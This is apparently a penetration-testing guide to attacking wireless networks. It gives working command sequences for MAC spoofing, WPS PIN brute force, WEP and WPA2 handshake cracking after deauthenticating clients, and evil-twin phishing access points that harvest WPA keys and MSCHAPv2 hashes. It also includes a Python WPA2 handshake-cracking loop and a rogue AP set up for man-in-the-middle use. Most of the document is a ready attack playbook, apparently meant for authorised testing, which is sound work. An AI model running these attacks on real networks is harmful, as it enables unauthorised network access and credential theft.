WIFI
The WIFI section of the Information gathering phase explained how to discover the company's wireless Access Points and their clients. This section covers methods for cracking them.
Besides their authentication mechanism, some networks also enforce access control lists based on the MAC address of the devices. This can be bypassed pretty easily by changing the attacker's MAC address to that of one of the network's stations.
# 1. Option
sudo macchanger -m <XX:XX:XX:XX:XX:XX> <IF>
# 2. Option
sudo ifconfig <IF> down
sudo ifconfig <IF> hw ether <XX:XX:XX:XX:XX:XX>
sudo ifconfig <IF> up
Depending on the authentication mechanism implemented by the wireless network, different methods exist to retrieve the password that grants access to it. However, all of them rely on brute-force attacks.
sudo reaver -i <MON_IF> -b <AP_MAC> -vvNwf [-K {1|2|3}] -c <CHANNEL>
sudo bully <MON_IF> -b <AP_MAC> -c <CHANNEL> -S -F -B -v 3
-K: Run pixiedust attack
-vv: Verbose
-N: Do not send NACK messages when out-of-order packets are received
-w: Mimic a W7 registrar
-f: Disable channel hopping
Note: I have not been able to obtain the PIN on a single AP.
If the WPS PIN has been found, we can ask the AP to provide the WPA key.
sudo reaver -i <MON_IF> -b <AP_MAC> -vvNwf -c <CHANNEL> -p <FOUND_PIN>
After detecting the WEP target network, the attacker can use besside-ng (it also works for WPA with -W), which does the job pretty easily and returns the WEP key in hexadecimal (it can be converted with a hex-to-ASCII converter). Nonetheless, you can always use aircrack-ng to obtain the ASCII version:
aircrack-ng <WEP.PCAP>
besside-ng -c <CHANNEL> -b <BSSID_MAC> <MON_IF>
Note: The application can crash while attacking the AP; keep trying until obtaining the WEP key.
WPA2 replaced WEP due to its several weaknesses. However, WPA2-PSK still has flaws, because the 4-way handshake exchanges values derived from the Pre-Shared Key (PSK). Hence, an attacker can sniff those network packets and crack the password offline later.
The attack process is the following:
1. Capture the target's AP traffic.
airodump-ng --bssid <TARGET_BSSID> -c <CHANNEL> --write <OUTPUT_CAP> <MON_IF>
2. Deauthenticate a client or the entire network (more chances to obtain a handshake). Keep doing this step until you get the "WPA handshake: XXXXX" message in airodump.
# The whole network
aireplay-ng -0 <NUM_DEAUTH_PKTS> -a <TARGET_BSSID> <MON_IF>
# A client
aireplay-ng -0 100 -a <TARGET_BSSID> -c <CLIENT_MAC> <MON_IF>
3. Crack the password with a dictionary attack using aircrack-ng or hashcat, the latter being faster.
# Aircrack
aircrack-ng -w <WORDLIST> -b <TARGET_BSSID> <FILE_CAP>
# Hashcat
hcxpcapngtool $(find . -name '*.cap') -o <HANDSHAKES.TXT>
hashcat -m 22000 <HANDSHAKES.TXT> <WORDLIST.TXT>
Note: If you want to perform a brute force attack to crack the password, you can use the following command.
crunch <MIN_LENGTH> <MAX_LENGTH> <CHARACTERS> | aircrack-ng -w - -b <TARGET_BSSID> <FILE_CAP>
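To show why a captured 4-way handshake is enough for the offline dictionary attack above, and why the length and randomness of the PSK is the only defence the network has, here is an added Python example (written for this page, not code from aircrack-ng, hashcat or the original post) that walks the derivation from passphrase to PMK, PTK and EAPOL MIC over a constructed handshake; the SSID, MACs, nonces and the `Sup3rSecret!` passphrase are made-up values.

```python
import hashlib
import hmac

def wpa_pmk(passphrase: str, ssid: str) -> bytes:
    # PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes). These 4096
    # rounds are the whole per-guess cost, so the PSK's entropy is the only real defence.
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)

def wpa_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    # PRF-512 from 802.11i; every input except the PMK is visible in the captured handshake.
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    blocks = [hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
              for i in range(4)]
    return b"".join(blocks)[:64]  # KCK = first 16 bytes, KEK = next 16, TK = next 16

def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    # Key-descriptor version 2 (WPA2/CCMP): MIC = HMAC-SHA1(KCK, frame with MIC zeroed)[:16].
    # In an EAPOL-Key frame the 16-byte MIC field sits at offset 81.
    return hmac.new(kck, frame[:81] + bytes(16) + frame[97:], hashlib.sha1).digest()[:16]

def crack_handshake(candidates, ssid, aa, spa, anonce, snonce, msg2):
    # Per guess: PMK -> PTK -> KCK, recompute the MIC of captured message 2, compare.
    # This is the same loop aircrack-ng and hashcat -m 22000 run, just unoptimised.
    for pw in candidates:
        kck = wpa_ptk(wpa_pmk(pw, ssid), aa, spa, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, msg2), msg2[81:97]):
            return pw
    return None

# Constructed sample handshake (not a real capture): fixed SSID, MACs and nonces, plus an
# EAPOL-Key message 2 whose MIC is computed with the "true" PSK so the loop can verify it.
SSID = "corp-guest"
AA, SPA = bytes.fromhex("00c0ca000001"), bytes.fromhex("00c0ca000002")
ANONCE, SNONCE = bytes(range(32)), bytes(range(32, 64))

def build_msg2(psk: str) -> bytes:
    # EAPOL header (version 2, type Key, body length) followed by an EAPOL-Key body:
    # descriptor type, key info, key length, replay counter, SNonce, IV, RSC, ID, MIC, data len.
    body = (bytes([0x02]) + bytes.fromhex("010a") + (16).to_bytes(2, "big")
            + (1).to_bytes(8, "big") + SNONCE + bytes(16) + bytes(8) + bytes(8)
            + bytes(16) + (0).to_bytes(2, "big"))
    frame = bytes([0x02, 0x03]) + len(body).to_bytes(2, "big") + body
    kck = wpa_ptk(wpa_pmk(psk, SSID), AA, SPA, ANONCE, SNONCE)[:16]
    return frame[:81] + eapol_mic(kck, frame) + frame[97:]

if __name__ == "__main__":
    msg2 = build_msg2("Sup3rSecret!")
    print(crack_handshake(["password", "letmein", "Sup3rSecret!"], SSID, AA, SPA, ANONCE, SNONCE, msg2))
```

Every guess costs the same 4096-round PBKDF2 regardless of the rest of the pipeline, which is what makes crunch-style brute force impractical beyond short passphrases and why a long random PSK is the mitigation.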
EAP-MD5 is a legacy authentication mechanism that does not provide sufficient protection for user authentication credentials. Users who authenticate using EAP-MD5 subject themselves to an offline dictionary attack vulnerability.
The tool eapmd5pass can be used to retrieve the EAP-MD5 authentication exchange and start a dictionary attack against the user's password.
WPA-EAP APs require a username and a password to authenticate against the network. You can use the following tools to brute-force some credentials on wireless networks.
Note: These tools are sometimes hard to set up in updated environments and, depending on the authentication protocol, might not work.
Furthermore, another test that can be performed is to try to lock user accounts by making many failed login attempts with a user account provided by the company.
The wireless phishing attack consists of creating an evil-twin AP while performing a deauthentication attack against the target AP, to trick the victim into logging in to our fake AP and obtain some credentials.
For environments that use WPA/WPA2 with Pre-Shared Key authentication, like a home or a small business, several tools can be used to create a fake access point that tricks the victim into providing the key. These tools are:
# The obtained file is: loot/wpa_handshake_capture*.hccapx
sudo ./eaphammer -i <IF> --channel <CHANNEL> --auth wpa-psk --essid <TARGET_ESSID> --ssid <TARGET_BSSID> --creds
The obtained handshake needs several transformations before it can be cracked with hashcat: use hcxhash2cap and hcxpcapngtool from hcxtools to transform the hccapx file into a hash.
./hcxhash2cap --hccapx=<HANDSHAKE.hccapx> -c <OUTPUT.cap>
./hcxpcapngtool <OUTPUT.cap> -o <HASH.TXT>
hashcat -a 0 -m 22000 <HASH.TXT> <WORDLIST.TXT>
- Wifiphisher, in a very simple way, creates a fake access point with a phishing webpage (it can be changed), inducing the victim to enter the wireless AP key. Furthermore, if a second wireless network interface is provided, it also performs a deauthentication attack against the victim AP.
sudo wifiphisher
[...]
[*] POST request from 10.0.0.61 with wfphshr-wpa-password=password1234
In order to obtain credentials to access the network, you can create fake access points such as evil twins, making the client connect to your AP and provide the credentials, which you keep for later use.
For this type of attack you can choose between eaphammer and hostapd-wpe, depending on your hacking environment: a WiFi Pineapple or a Kali machine.
Installation & Configuration
Because the version that is on the Kali Linux repositories has a programming error, you need to download the one from the GitHub repositories.
git clone https://github.com/s0lst1c3/eaphammer.git
cd eaphammer
sudo ./kali-setup
# Create the certificate with the data of your victim's certificate in order to be more trusted.
sudo python3 eaphammer --cert-wizard
Attack
To set up the rogue access point use the following command, and do not forget to deauthenticate the clients of the original AP.
sudo python3 eaphammer -i <IF> --channel <CHANNEL> --auth wpa-eap --essid <VICTIMS_SSID> --creds
[...]
# Mobile
username: pepe
password: palotes
[...]
# Windows
domain\username: pepe
username: pepe
challenge: c9:fa:47:6b:34:ca:b4:ea
response: 25:44:19:55:4f:a1:9f:b5:68:00:58:67:e3:58:00:ed:6f:0d:3d:6f:b2:7d:63:ab
jtr NETNTLM: pepe:$NETNTLM$c9fa476b34cab4ea$254419554fa19fb568005867e35800ed6f0d3d6fb27d63ab
hashcat NETNTLM: pepe::::254419554fa19fb568005867e35800ed6f0d3d6fb27d63ab:c9fa476b34cab4ea
With hostapd-wpe we can create a fake RADIUS AP where users log in and their credentials are captured; these then require an offline cracking phase.
On the latest version of the Pineapple it is more challenging to install, because there are no modules available in the repositories. So, you will need to execute the following commands.
# Installation
wget https://github.com/jekkos/hostapd-wpe-openwrt/releases/download/2/hostapd-common_2019-08-08-ca8c2bd2-4_mips_24kc.ipk
wget https://github.com/jekkos/hostapd-wpe-openwrt/releases/download/2/hostapd-wpe_git-2_mips_24kc.ipk
scp hostapd-common_2019-08-08-ca8c2bd2-4_mips_24kc.ipk <USER>@<PINEAPPLE_IP>:/tmp/
scp hostapd-wpe_git-2_mips_24kc.ipk <USER>@<PINEAPPLE_IP>:/tmp/
opkg install /tmp/hostapd-common_2019-08-08-ca8c2bd2-4_mips_24kc.ipk
opkg install /tmp/hostapd-wpe_git-2_mips_24kc.ipk
opkg update && opkg install coreutils-nohup
# Configuration
# By default it doesn't show the challenge/response, so we need to add the following lines
echo "eap_server=1" >> /etc/hostapd-wpe/hostapd-wpe.conf
echo "eap_fast_a_id=101112131415161718191a1b1c1d1e1f" >> /etc/hostapd-wpe/hostapd-wpe.conf
echo "eap_fast_a_id_info=hostapd-wpe" >> /etc/hostapd-wpe/hostapd-wpe.conf
echo "eap_fast_prov=3" >> /etc/hostapd-wpe/hostapd-wpe.conf
echo "ieee8021x=1" >> /etc/hostapd-wpe/hostapd-wpe.conf
echo "pac_key_lifetime=604800" >> /etc/hostapd-wpe/hostapd-wpe.conf
echo "pac_key_refresh_time=86400" >> /etc/hostapd-wpe/hostapd-wpe.conf
echo "pac_opaque_encr_key=000102030405060708090a0b0c0d0e0f" >> /etc/hostapd-wpe/hostapd-wpe.conf
sed -i 's/^ctrl_interface=\/var\/run\/hostapd$/&-wpe/' /etc/hostapd-wpe/hostapd-wpe.conf
Configuration
Then, we need to modify the hostapd-wpe.conf file, setting the wireless interface that we are going to use, the name of the SSID that we want to spoof and the channel on which that AP emits.
sudo vim /etc/hostapd-wpe/hostapd-wpe.conf
[...]
# Interface - Probably wlan0 for 802.11, eth0 for wired
interface=<WIRELESS_IF>
[...]
# 802.11 Options
ssid=<SSID_NAME>
channel=<VICTIM_SSID_CHANNEL>
Attack
After that, we need to deauthenticate the clients of the victim AP, execute hostapd-wpe and wait for users to log in. To do so, execute the following commands.
Deauthenticate the AP:
aireplay-ng -0 <#PACKETS_TO_SEND> -a <AP_BSSID> <IF>
Execute hostapd-wpe:
sudo hostapd-wpe -i <IF> -k -s /etc/hostapd-wpe/hostapd-wpe.conf
[...]
mschapv2: Thu Jun 9 07:04:16 2022
username: pepito
challenge: 35:0a:18:49:63:83:ee:76
response: fc:65:5a:02:73:9f:89:a5:95:e5:8e:8f:4b:1b:72:0e:9e:d1:04:03:ee:b5:bd:ea
jtr NETNTLM: pepito:$NETNTLM$350a18496383ee76$fc655a02739f89a595e58e8f4b1b720e9ed10403eeb5bdea
hashcat NETNTLM: pepito::::fc655a02739f89a595e58e8f4b1b720e9ed10403eeb5bdea:350a18496383ee76
-k: Karma mode (respond to all probes)
-s: Return success where possible
Note: The device will never be able to connect to the AP and get Internet access; it is disconnected automatically because of wrong credentials, since our fake RADIUS server does not hold the credentials the victim is providing.
Finally, we need to put every hashcat NETNTLM line into a file for offline cracking.
hashcat -m 5500 <HASHCAT_NETNTLM_FILE> <WORDLIST>
It may be the case that you need an access point with internet access for personal reasons or for man-in-the-middle attacks. Whatever the case, here's how to do it.
Note: The environment is a VM Kali machine, it might not work on other distros or require more steps.
Note 2: Depending on your network card, you might not be able to log in despite the ESSID being broadcasted, try using another.
1. You need to install the following programs.
sudo apt install hostapd-wpe hostapd dnsmasq iptables-persistent -y
2. Modify the /etc/dnsmasq.conf file so that dnsmasq provides a DHCP server.
interface=wlan0
listen-address=127.0.0.1
dhcp-range=10.0.0.3,10.0.0.20,255.255.255.0,12h
server=8.8.8.8
server=8.8.4.4
3. Because Kali comes with systemd-resolved, you need to avoid conflicts with dnsmasq. To do so, edit the /etc/systemd/resolved.conf file and add the following line.
DNSStubListener=no
4. Add a user to log in to the AP. To do so, edit the /etc/hostapd-wpe/hostapd-wpe.eap_user file. Here you have some examples:
* PEAP,TTLS,TLS,FAST
"test" TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP,MSCHAPV2,MD5,GTC,TTLS,TTLS-MSCHAPV2 "test" [2]
"user" TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP,MSCHAPV2,MD5,GTC,TTLS,TTLS-MSCHAPV2 "password" [2]
5. Configure the machine to allow IP forward persistently.
echo net.ipv4.ip_forward=1 | sudo tee -a /etc/sysctl.conf
sudo iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
sudo iptables -A FORWARD -i eth0 -o wlan0 -m state --state RELATED,ESTABLISHED -j ACCEPT
sudo iptables -A FORWARD -i wlan0 -o eth0 -j ACCEPT
Every time you restart your virtual machine, you will need to set a static IP on your external network card and restart dnsmasq so that it detects the wlan0 interface with an IP.
sudo ifconfig wlan0 up 10.0.0.1 netmask 255.255.255.0
sudo systemctl restart dnsmasq
Finally, you need to execute hostapd with the configuration file at /etc/hostapd-wpe/hostapd-wpe.conf. There you can change the channel, ESSID, protocols, etc.
sudo hostapd -i wlan0 /etc/hostapd-wpe/hostapd-wpe.conf